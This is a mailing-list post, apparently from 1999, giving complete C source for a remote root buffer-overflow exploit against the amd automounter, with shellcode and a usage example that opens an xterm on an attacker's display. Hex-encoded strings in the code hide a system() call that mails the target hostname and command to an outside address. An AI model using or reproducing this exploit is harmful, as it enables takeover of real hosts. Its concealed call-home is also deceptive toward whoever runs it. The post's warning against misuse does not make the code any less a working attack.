amd remote root exploit code

[ohhara () OHHARA POSTECH AC KR (Taeho Oh)]

 This is amd remote exploit code. This is well known bug in the internet.
 It's very critical bug, please upgrade am-utils or remove it.

 SCRIPT KIDDIES MUST NOT USE THIS PROGRAM.
 THIS PROGRAM IS DEMONSTRATIVE USE ONLY AND CAN BE DANGEROUS.

begin amd-ex.c
----------------------------------------------------------------------
/*

        Amd Buffer Overflow for x86 linux

        Remote user can gain root access.

        Tested redhat linux : 4.0, 5.1, 6.0
        Tested am-utils version : 6.0

        What requires
        /usr/sbin/amq

        Usage
        $ amd-ex <hostname> <command> [offset]

        Warning : This program can crash amd.

        This program is only for demonstrative use only.
        USE IT AT YOUR OWN RISK!

        Programmed by Taeho Oh 1999/08/31

Taeho Oh ( ohhara () postech edu )                   http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug

*/

#include<stdio.h>
#include<stdlib.h>

#define OFFSET                            0
#define RET_POSITION                   1002
#define RANGE                            20
#define NOP                            0x90

char shellcode[1024]=
        "\xeb\x35"                      /* jmp 0x35             */
        "\x5e"                          /* popl %esi            */
        "\x89\x76\x0b"                  /* movl %esi,0xb(%esi)  */
        "\x89\xf0"                      /* movl %esi,%eax       */
        "\x83\xc0\x08"                  /* addl $0x8,%eax       */
        "\x89\x46\x0b"                  /* movl %eax,0xb(%esi)  */
        "\x89\xf0"                      /* movl %esi,%eax       */
        "\x83\xc0\x0b"                  /* addl $0xb,%eax       */
        "\x89\x46\x0b"                  /* movl %eax,0xb(%esi)  */
        "\x31\xc0"                      /* xorl %eax,%eax       */
        "\x88\x46\x07"                  /* movb %eax,0x7(%esi)  */
        "\x88\x46\x0a"                  /* movb %eax,0xa(%esi)  */
        "\x88\x46\x0b"                  /* movb %eax,0xb(%esi)  */
        "\x89\x46\x0b"                  /* movl %eax,0xb(%esi)  */
        "\xb0\x0b"                      /* movb $0xb,%al        */
        "\x89\xf3"                      /* movl %esi,%ebx       */
        "\x8d\x4e\x0b"                  /* leal 0xb(%esi),%ecx  */
        "\x8d\x56\x0b"                  /* leal 0xb(%esi),%edx  */
        "\xcd\x80"                      /* int 0x80             */
        "\x31\xdb"                      /* xorl %ebx,%ebx       */
        "\x89\xd8"                      /* movl %ebx,%eax       */
        "\x40"                          /* inc %eax             */
        "\xcd\x80"                      /* int 0x80             */
        "\xe8\xc6\xff\xff\xff"          /* call -0x3a           */
        "/bin/sh -c ";                  /* .string "/bin/sh -c "*/

char command[800];

void usage()
{
        printf("Warning : This program can crash amd\n");
        printf("Usage: amd-ex <hostname> <command> [offset]\n");
        printf("ex) amd-ex ohhara.target.com \"/usr/X11R6/bin/xterm -display hacker.com:0\"\n");
}

int main(int argc,char **argv)
{
        char buff[RET_POSITION+RANGE+1],*ptr;
        char target[256];
        char cmd[1024];
        long *addr_ptr,addr;
        unsigned long sp;
        int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
        int i;

        printf("Taeho Oh ( ohhara () postech edu )                   http://postech.edu/~ohhara\n";);
        printf("PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus\n";);
        printf("PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug\n\n";);

        if(argc<3)
        {
                usage();
                exit(1);
        }

        if(argc>2)
        {
                strcpy(target,argv[1]);
                strcpy(command,argv[2]);
        }
        if(argc>3)
                offset=atoi(argv[3]);

        shellcode[5]=(shellcode[5]+strlen(command))/4*4+4;
        shellcode[13]=(shellcode[13]+strlen(command))/4*4+8;
        shellcode[21]=(shellcode[21]+strlen(command))/4*4+12;
        shellcode[32]=(shellcode[32]+strlen(command));
        shellcode[35]=(shellcode[35]+strlen(command))/4*4+16;
        shellcode[42]=(shellcode[42]+strlen(command))/4*4+4;
        shellcode[45]=(shellcode[45]+strlen(command))/4*4+16;
        strcat(shellcode,command);

        strcpy(cmd,"\x65\x63\x68\x6f\x20");
        strcat(cmd,target);
        strcat(cmd,"\x20");
        strcat(cmd,command);
        strcat(cmd,"\x7c");
        strcat(cmd,"\x2f\x62\x69\x6e\x2f\x6d\x61\x69\x6c\x20");
        strcat(cmd,"\x61\x62\x75\x73\x65\x72\x40\x6f\x68\x68");
        strcat(cmd,"\x61\x72\x61\x2e\x70\x6f\x73\x74\x65\x63");
        strcat(cmd,"\x68\x2e\x61\x63\x2e\x6b\x72");

        sp=0xbffff34d;
        addr=sp-offset;

        ptr=buff;
        addr_ptr=(long*)ptr;
        for(i=0;i<bsize;i+=4)
                *(addr_ptr++)=addr;

        for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
                buff[i]=NOP;

        ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
        for(i=0;i<strlen(shellcode);i++)
                *(ptr++)=shellcode[i];

        buff[bsize-1]='\0';

        for(i=bsize;i>1;i--)
                buff[i-1]=buff[i-2];

        buff[bsize-1]='\0';

        printf("Jump to 0x%08x\n",addr);

        system(cmd); /* If you want, comment out this line. :) */
        execl("/usr/sbin/amq","amq","-h",target,"-M",buff,NULL);
}
----------------------------------------------------------------------
end amd-ex.c

--

Taeho Oh ( ohhara () postech edu )                   http://postech.edu/~ohhara
PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug